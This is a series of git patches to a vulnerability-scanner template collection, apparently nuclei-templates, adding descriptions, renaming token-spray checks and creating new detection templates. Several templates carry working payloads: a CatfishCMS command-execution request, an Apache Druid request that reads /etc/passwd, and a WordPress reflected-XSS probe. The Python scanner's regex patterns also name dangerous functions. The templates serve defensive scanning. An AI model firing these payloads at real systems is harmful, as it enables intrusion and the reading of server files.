sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. reference: https://cxsecurity.com/issue/WLB-2020030114 tags: wp-plugin,redirect,wordpress From d226205902e0647fb2e03551a905909265589d08 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 12:51:18 +0530 Subject: [PATCH 030/145] Update and rename webex.yaml to api-webex.yaml --- token-spray/{webex.yaml => api-webex.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename token-spray/{webex.yaml => api-webex.yaml} (92%) diff --git a/token-spray/webex.yaml b/token-spray/api-webex.yaml similarity index 92% rename from token-spray/webex.yaml rename to token-spray/api-webex.yaml index d876d5a459..e8f60ed51b 100644 --- a/token-spray/webex.yaml +++ b/token-spray/api-webex.yaml @@ -3,9 +3,9 @@ id: api-webex info: name: Cisco Webex API Test author: dwisiswant0 - reference: https://developer.webex.com/docs/getting-started severity: info - tags: token-spray,cisco + reference: https://developer.webex.com/docs/getting-started + tags: token-spray,cisco,webex self-contained: true requests: From 17d4b8f95f44b714ed185851811664acab127945 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 12:52:21 +0530 Subject: [PATCH 031/145] Update and rename leanix.yaml to api-leanix.yaml --- token-spray/{leanix.yaml => api-leanix.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename token-spray/{leanix.yaml => api-leanix.yaml} (100%) diff --git a/token-spray/leanix.yaml b/token-spray/api-leanix.yaml similarity index 100% rename from token-spray/leanix.yaml rename to token-spray/api-leanix.yaml index 8ad2e155eb..53be0b6e95 100644 --- a/token-spray/leanix.yaml +++ b/token-spray/api-leanix.yaml @@ -3,8 +3,8 @@ id: api-leanix info: name: LeanIX API Test author: dwisiswant0 - reference: https://docs.leanix.net/docs/rest-api severity: info + reference: https://docs.leanix.net/docs/rest-api tags: token-spray,leanix self-contained: true From 012b4e9a2559d52530509639b9738b2024c195aa Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 12:53:50 +0530 Subject: [PATCH 032/145] Update and rename adafruit-io.yaml to api-adafruit-io.yaml --- token-spray/{adafruit-io.yaml => api-adafruit-io.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename token-spray/{adafruit-io.yaml => api-adafruit-io.yaml} (100%) diff --git a/token-spray/adafruit-io.yaml b/token-spray/api-adafruit-io.yaml similarity index 100% rename from token-spray/adafruit-io.yaml rename to token-spray/api-adafruit-io.yaml index b2253a1eac..c9eb638d7d 100644 --- a/token-spray/adafruit-io.yaml +++ b/token-spray/api-adafruit-io.yaml @@ -3,8 +3,8 @@ id: api-adafruit-io info: name: Adafruit IO API Test author: dwisiswant0 - reference: https://io.adafruit.com/api/docs/ severity: info + reference: https://io.adafruit.com/api/docs/ tags: token-spray,adafruit self-contained: true From 426e37b3f19cfbde7adbf5336bed6e9c078b10ab Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 12:54:35 +0530 Subject: [PATCH 033/145] Update and rename appveyor.yaml to api-appveyor.yaml --- token-spray/{appveyor.yaml => api-appveyor.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename token-spray/{appveyor.yaml => api-appveyor.yaml} (100%) diff --git a/token-spray/appveyor.yaml b/token-spray/api-appveyor.yaml similarity index 100% rename from token-spray/appveyor.yaml rename to token-spray/api-appveyor.yaml index c2b27b6d35..e1b8ee023e 100644 --- a/token-spray/appveyor.yaml +++ b/token-spray/api-appveyor.yaml @@ -3,8 +3,8 @@ id: api-appveyor info: name: AppVeyor API Test author: dwisiswant0 - reference: https://www.appveyor.com/docs/api/ severity: info + reference: https://www.appveyor.com/docs/api/ tags: token-spray,appveyor self-contained: true From e5e4dee853c6ae72ebc4b1f238bcc5c66c08231a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 12:56:04 +0530 Subject: [PATCH 034/145] Update and rename dbt.yaml to api-dbt.yaml --- token-spray/{dbt.yaml => api-dbt.yaml} | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) rename token-spray/{dbt.yaml => api-dbt.yaml} (85%) diff --git a/token-spray/dbt.yaml b/token-spray/api-dbt.yaml similarity index 85% rename from token-spray/dbt.yaml rename to token-spray/api-dbt.yaml index 3c3dd15317..8d19b5b055 100644 --- a/token-spray/dbt.yaml +++ b/token-spray/api-dbt.yaml @@ -3,8 +3,8 @@ id: api-dbt info: name: dbt Cloud API Test author: dwisiswant0 - reference: https://docs.getdbt.com/docs/introduction severity: info + reference: https://docs.getdbt.com/docs/introduction tags: token-spray,dbt self-contained: true @@ -21,4 +21,6 @@ requests: part: body words: - "Invalid token" + - "Authentication credentials were not provided." + condition: or negative: true From 1cc0b56f813927a9048dcdc430a1514fedbf44c4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 12:57:30 +0530 Subject: [PATCH 035/145] Rename taiga.yaml to api-taiga.yaml --- token-spray/{taiga.yaml => api-taiga.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename token-spray/{taiga.yaml => api-taiga.yaml} (100%) diff --git a/token-spray/taiga.yaml b/token-spray/api-taiga.yaml similarity index 100% rename from token-spray/taiga.yaml rename to token-spray/api-taiga.yaml From 23890128b3306664d764072cfaf8fa7e064fabb7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 12:58:18 +0530 Subject: [PATCH 036/145] Update and rename strava.yaml to api-strava.yaml --- token-spray/{strava.yaml => api-strava.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename token-spray/{strava.yaml => api-strava.yaml} (92%) diff --git a/token-spray/strava.yaml b/token-spray/api-strava.yaml similarity index 92% rename from token-spray/strava.yaml rename to token-spray/api-strava.yaml index cbe7b3cf90..b7ec7eb8b9 100644 --- a/token-spray/strava.yaml +++ b/token-spray/api-strava.yaml @@ -19,5 +19,5 @@ requests: - type: word part: body words: - - "errors" + - "Authorization Error" negative: true From c37c71f8595af955079b8ad5ca46398563248774 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 14:35:29 +0530 Subject: [PATCH 037/145] Update python-scanner.yaml --- file/python/python-scanner.yaml | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml index fb7b6a7902..7952ec59b4 100644 --- a/file/python/python-scanner.yaml +++ b/file/python/python-scanner.yaml @@ -4,8 +4,10 @@ info: name: Python Scanner author: majidmc2 severity: info - description: Scan for dangerous Python functions. - reference: https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html, https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html + description: Scan for dangerous Python functions + reference: + - https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html + - https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html tags: python,file @@ -15,7 +17,7 @@ file: extractors: - type: regex - name: Possibility of Code Injection vulnerability + name: Possible Code Injection regex: - 'exec' - 'eval' @@ -23,7 +25,7 @@ file: - type: regex - name: The Command Injection series + name: Possible Command Injection regex: - 'subprocess.call\(.*shell=True.*\)' - 'os.system' @@ -31,19 +33,18 @@ file: - type: regex - name: The pickle module is not secure + name: Possibly Unpickling untrusted source regex: - 'pickle.loads' - 'cPickle.loads' - type: regex - name: Loading dangerous YAMLs + name: Possibly loading dangerous YAMLs regex: - 'yaml.load' - - type: regex - name: Possibility of SQLi vulnerability + name: Possible SQLi regex: - 'cursor.execute' From a6ab5dd77108d1c8e3eb3cb4f2fc9d7f0969be21 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 14:35:43 +0530 Subject: [PATCH 038/145] Update python-scanner.yaml --- file/python/python-scanner.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml index 7952ec59b4..6f7b8770d6 100644 --- a/file/python/python-scanner.yaml +++ b/file/python/python-scanner.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html - https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html - tags: python,file + tags: python,file,sast file: From e4a646f9d48c7e6297d8acb25731eb6c6f724d8c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 15:00:32 +0530 Subject: [PATCH 039/145] Update and rename misconfiguration/unauth-securityspy-camera-detect.yaml to exposed-panels/securityspy-detect.yaml --- .../securityspy-detect.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) rename misconfiguration/unauth-securityspy-camera-detect.yaml => exposed-panels/securityspy-detect.yaml (64%) diff --git a/misconfiguration/unauth-securityspy-camera-detect.yaml b/exposed-panels/securityspy-detect.yaml similarity index 64% rename from misconfiguration/unauth-securityspy-camera-detect.yaml rename to exposed-panels/securityspy-detect.yaml index 76a4fc955c..0a4b18858c 100644 --- a/misconfiguration/unauth-securityspy-camera-detect.yaml +++ b/exposed-panels/securityspy-detect.yaml @@ -1,21 +1,24 @@ -id: unauth-SecuritySpy-camera-detect +id: securityspy-detect info: - name: SecuritySpy Detect + name: SecuritySpy Camera Detect author: pussycat0x severity: medium metadata: shodan-dork: 'title:SecuritySpy' - tags: unauth, iot + tags: unauth,iot,securityspy,panel,camera + requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - 'SecuritySpy' - condition: and + part: body + - type: status status: - 200 From a96bfc3992fe58b899aa8a7ade68b30931b1ef1c Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:52:58 +0300 Subject: [PATCH 040/145] Add description --- vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml | 1 + vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml index 64d1b30634..c7641f841a 100644 --- a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml +++ b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml @@ -4,6 +4,7 @@ info: name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection author: 0x_Akoko severity: low + description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL. reference: https://cxsecurity.com/issue/WLB-2020040103 tags: wordpress,wp-plugin,redirect diff --git a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml index 683cf92dc3..226a87797b 100644 --- a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml +++ b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml @@ -3,6 +3,7 @@ info: name: WordPress accessible wp-config author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n severity: high + description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading. tags: wordpress,backup requests: From 6a6ba60aade8f70f1cb9a3e205cff190d340b6e2 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:53:22 +0300 Subject: [PATCH 041/145] Description --- vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml index d649437101..4b8b194cfc 100644 --- a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml +++ b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml @@ -4,6 +4,7 @@ info: name: WordPress Attitude Themes 1.1.1 Open Redirection author: 0x_Akoko severity: low + description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL. reference: https://cxsecurity.com/issue/WLB-2020030183 tags: wordpress,wp-theme,redirect From c9e9c04f37856d253f422325be2d7e8bd6dd8902 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:54:00 +0300 Subject: [PATCH 042/145] Add description --- vulnerabilities/wordpress/easy-wp-smtp-listing.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml index 1c669ac324..6225458a19 100644 --- a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml +++ b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml @@ -4,6 +4,7 @@ info: name: SMTP WP Plugin Directory listing enabled author: PR3R00T severity: high + description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access. reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ tags: wordpress,wp-plugin From 9f8270bb7a4857ec0754eaa59c96a3f4f6137711 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:54:49 +0300 Subject: [PATCH 043/145] Add description --- vulnerabilities/other/webui-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/webui-rce.yaml b/vulnerabilities/other/webui-rce.yaml index 82d1fab54a..384fe2d49f 100644 --- a/vulnerabilities/other/webui-rce.yaml +++ b/vulnerabilities/other/webui-rce.yaml @@ -3,6 +3,7 @@ info: name: WebUI 1.5b6 RCE author: pikpikcu severity: critical + description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. reference: https://www.exploit-db.com/exploits/36821 tags: webui,rce From 3029da4ceb8d8c288f22da073e7d6dbcd08994fb Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:55:23 +0300 Subject: [PATCH 044/145] Add description --- vulnerabilities/other/unauth-spark-api.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/unauth-spark-api.yaml b/vulnerabilities/other/unauth-spark-api.yaml index 8a936e9aa0..56ccbcbe76 100644 --- a/vulnerabilities/other/unauth-spark-api.yaml +++ b/vulnerabilities/other/unauth-spark-api.yaml @@ -3,6 +3,7 @@ info: name: Unauthenticated Spark REST API author: princechaddha severity: medium + description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it. reference: https://xz.aliyun.com/t/2490 tags: spark,unauth From 319c8a830e9aade672d3dbb6f33c407f806c4d83 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:56:03 +0300 Subject: [PATCH 045/145] Add description --- vulnerabilities/other/vpms-auth-bypass.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml index 6f612b4f78..a59b7b3bd1 100644 --- a/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/vulnerabilities/other/vpms-auth-bypass.yaml @@ -4,6 +4,7 @@ info: name: Vehicle Parking Management System 1.0 - Authentication Bypass author: dwisiswant0 severity: high + description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter. reference: https://www.exploit-db.com/exploits/48877 tags: auth-bypass requests: From f9fb28277015cba688cbfee2c47a32ad833a0b6f Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:57:40 +0300 Subject: [PATCH 046/145] Add description --- vulnerabilities/other/viewlinc-crlf-injection.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/viewlinc-crlf-injection.yaml b/vulnerabilities/other/viewlinc-crlf-injection.yaml index c1e677dcb7..199d945cd7 100644 --- a/vulnerabilities/other/viewlinc-crlf-injection.yaml +++ b/vulnerabilities/other/viewlinc-crlf-injection.yaml @@ -4,6 +4,7 @@ info: name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection. author: geeknik severity: low + description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned. reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system tags: crlf,viewlinc From e4018d4a0c54552db90609699790ef47d52f56a1 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:58:22 +0300 Subject: [PATCH 047/145] Add description --- vulnerabilities/other/ueditor-file-upload.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/ueditor-file-upload.yaml b/vulnerabilities/other/ueditor-file-upload.yaml index 07225c62db..733c46e297 100644 --- a/vulnerabilities/other/ueditor-file-upload.yaml +++ b/vulnerabilities/other/ueditor-file-upload.yaml @@ -3,6 +3,7 @@ info: name: UEditor Arbitrary File Upload author: princechaddha severity: high + description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code. reference: - https://zhuanlan.zhihu.com/p/85265552 - https://www.freebuf.com/vuls/181814.html From 081a2546fefd906ac50420a5175a6576a93f827f Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:59:08 +0300 Subject: [PATCH 048/145] Add description --- vulnerabilities/other/wems-manager-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/wems-manager-xss.yaml b/vulnerabilities/other/wems-manager-xss.yaml index b73ec6dc84..db201ad502 100644 --- a/vulnerabilities/other/wems-manager-xss.yaml +++ b/vulnerabilities/other/wems-manager-xss.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium tags: xss - + description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter. reference: - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html From a197ec8370d00a0d9a634a28b4d75eeb62a28794 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 25 Oct 2021 16:03:46 +0530 Subject: [PATCH 049/145] misc formatting update --- file/python/python-scanner.yaml | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml index 6f7b8770d6..6542b33797 100644 --- a/file/python/python-scanner.yaml +++ b/file/python/python-scanner.yaml @@ -4,7 +4,7 @@ info: name: Python Scanner author: majidmc2 severity: info - description: Scan for dangerous Python functions + description: Indicators for dangerous Python functions reference: - https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html - https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html @@ -17,7 +17,8 @@ file: extractors: - type: regex - name: Possible Code Injection + name: code-injection + condition: or regex: - 'exec' - 'eval' @@ -25,7 +26,8 @@ file: - type: regex - name: Possible Command Injection + name: command-injection + condition: or regex: - 'subprocess.call\(.*shell=True.*\)' - 'os.system' @@ -33,18 +35,19 @@ file: - type: regex - name: Possibly Unpickling untrusted source + name: untrusted-source + condition: or regex: - 'pickle.loads' - 'cPickle.loads' - type: regex - name: Possibly loading dangerous YAMLs + name: dangerous-yaml regex: - 'yaml.load' - type: regex - name: Possible SQLi + name: sqli regex: - - 'cursor.execute' + - 'cursor.execute' \ No newline at end of file From 0c87175275a00c505d07f4ec2e8ddf251ab98b5d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 16:24:44 +0530 Subject: [PATCH 050/145] Create CNVD-2019-06255.yaml --- cnvd/CNVD-2019-06255.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cnvd/CNVD-2019-06255.yaml diff --git a/cnvd/CNVD-2019-06255.yaml b/cnvd/CNVD-2019-06255.yaml new file mode 100644 index 0000000000..ebde1670fe --- /dev/null +++ b/cnvd/CNVD-2019-06255.yaml @@ -0,0 +1,27 @@ +id: CNVD-2019-06255 +info: + name: CatfishCMS RCE + author: Lark-Lab + severity: medium + reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/ + tags: rce,cvnd,catfishcms + +requests: + - method: GET + path: + - "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system" + + redirects: true + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'OS' + - 'PATH' + - 'SHELL' + - 'USER' + condition: and From 0eb9092fe2c103011761e6157188208e0b15dece Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 25 Oct 2021 10:55:07 +0000 Subject: [PATCH 051/145] Auto README Update [Mon Oct 25 10:55:07 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 47d02bb65e..46fe32d081 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 166 | madrobot | 63 | file | 50 | | | | | -**176 directories, 2418 files**. +**177 directories, 2443 files**. From 7ca507d5eed578450e08b17dcfb2d2da0643cd0e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 16:49:18 +0530 Subject: [PATCH 052/145] Update CNVD-2019-06255.yaml --- cnvd/CNVD-2019-06255.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cnvd/CNVD-2019-06255.yaml b/cnvd/CNVD-2019-06255.yaml index ebde1670fe..82b7c18ae9 100644 --- a/cnvd/CNVD-2019-06255.yaml +++ b/cnvd/CNVD-2019-06255.yaml @@ -11,13 +11,12 @@ requests: path: - "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system" - redirects: true - matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'OS' From e30362f0ab493a81f6d6f787ceacc5b43e739d85 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 25 Oct 2021 17:08:57 +0530 Subject: [PATCH 053/145] extractors doesn't support "condition" attribute explicitly --- file/python/python-scanner.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml index 6542b33797..c949abfae5 100644 --- a/file/python/python-scanner.yaml +++ b/file/python/python-scanner.yaml @@ -18,7 +18,6 @@ file: extractors: - type: regex name: code-injection - condition: or regex: - 'exec' - 'eval' @@ -27,7 +26,6 @@ file: - type: regex name: command-injection - condition: or regex: - 'subprocess.call\(.*shell=True.*\)' - 'os.system' @@ -36,7 +34,6 @@ file: - type: regex name: untrusted-source - condition: or regex: - 'pickle.loads' - 'cPickle.loads' From 1db2405c25e4ef807ad8d961fd585f75b0eeade3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 17:30:48 +0530 Subject: [PATCH 054/145] Create CVE-2021-36749.yaml --- cves/2021/CVE-2021-36749.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2021/CVE-2021-36749.yaml diff --git a/cves/2021/CVE-2021-36749.yaml b/cves/2021/CVE-2021-36749.yaml new file mode 100644 index 0000000000..c0f1e3224e --- /dev/null +++ b/cves/2021/CVE-2021-36749.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-36749 + +info: + name: Apache Druid Authentication Restrictions Bypass + author: _0xf4n9x_ + severity: medium + description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-36749 + - https://www.cvedetails.com/cve/CVE-2021-36749/ + - https://github.com/BrucessKING/CVE-2021-36749 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 6.5 + cve-id: CVE-2021-36749 + cwe-id: CWE-668 + tags: cve,cve2021,apache,lfi,auth-bypass + +requests: + - raw: + - | + POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - "druid:*:1000:1000:" + condition: or From f37ac4f60b7ce602c6f6a7e342cd2d5ae7cf3957 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 25 Oct 2021 20:05:08 +0700 Subject: [PATCH 055/145] Create CVE-2016-1000136.yaml --- cves/2016/CVE-2016-1000136.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2016/CVE-2016-1000136.yaml diff --git a/cves/2016/CVE-2016-1000136.yaml b/cves/2016/CVE-2016-1000136.yaml new file mode 100644 index 0000000000..b939c0b525 --- /dev/null +++ b/cves/2016/CVE-2016-1000136.yaml @@ -0,0 +1,30 @@ +id: CVE-2016-1000136 + +info: + name: heat-trackr v1.0 - Reflected Cross-Site Scripting (XSS) via heat-trackr_abtest_add.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin heat-trackr v1.0 + reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=798 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - '"><"' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 3c21e2fc163b4fe6dfbf2ccb5415f7fffefc7b19 Mon Sep 17 00:00:00 2001 From: Philipp Dahse Date: Mon, 25 Oct 2021 15:45:49 +0200 Subject: [PATCH 056/145] Add Redis Commander Panel Detection Redis Commander is a common ui for redis. Access to Redis Commander can allow access to redis and expose sensible session or cache data. --- exposed-panels/redis-commander-exposure.yaml | 22 ++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/redis-commander-exposure.yaml diff --git a/exposed-panels/redis-commander-exposure.yaml b/exposed-panels/redis-commander-exposure.yaml new file mode 100644 index 0000000000..fea8a67df6 --- /dev/null +++ b/exposed-panels/redis-commander-exposure.yaml @@ -0,0 +1,22 @@ +id: redis-commander-exposure + +info: + name: Redis Commander Exposure + author: dahse89 + severity: low + reference: + - https://joeferner.github.io/redis-commander/ + - https://github.com/joeferner/redis-commander + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - "Redis Commander" + - "redisCommanderBearerToken" + condition: and From e8d0bd1e7e8eca0f731f9aa73030a7d8b2462253 Mon Sep 17 00:00:00 2001 From: johnk3r <johnatan2camargo@gmail.com> Date: Mon, 25 Oct 2021 19:27:44 -0300 Subject: [PATCH 057/145] Create sugarcrm-panel.yaml --- exposed-panels/sugarcrm-panel.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/sugarcrm-panel.yaml diff --git a/exposed-panels/sugarcrm-panel.yaml b/exposed-panels/sugarcrm-panel.yaml new file mode 100644 index 0000000000..cd23c86b30 --- /dev/null +++ b/exposed-panels/sugarcrm-panel.yaml @@ -0,0 +1,25 @@ +id: sugarcrm-panel + +info: + name: Detect SugarCRM Panel + author: johnk3r + reference: https://www.shodan.io/search?query=sugarcrm + severity: info + tags: sugarcrm,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/index.php?action=Login&module=Users" + + matchers-condition: and + matchers: + - type: word + words: + - "<title>SugarCRM" + part: body + + - type: status + status: + - 200 From 6639cb99cc65244e31fca64838a7bd3a102b61f0 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 26 Oct 2021 08:02:31 +0900 Subject: [PATCH 058/145] Create wp-javospot-premium-theme-lfi.yaml --- wp-javospot-premium-theme-lfi.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 wp-javospot-premium-theme-lfi.yaml diff --git a/wp-javospot-premium-theme-lfi.yaml b/wp-javospot-premium-theme-lfi.yaml new file mode 100644 index 0000000000..d616291a71 --- /dev/null +++ b/wp-javospot-premium-theme-lfi.yaml @@ -0,0 +1,26 @@ +id: wp-javospot-premium-theme-lfi + +info: + name: Javo Spot Premium Theme - Unauthenticated Directory Traversal + author: 0x_Akoko + severity: high + tags: wordpress,wp-theme,lfi,wp + reference: 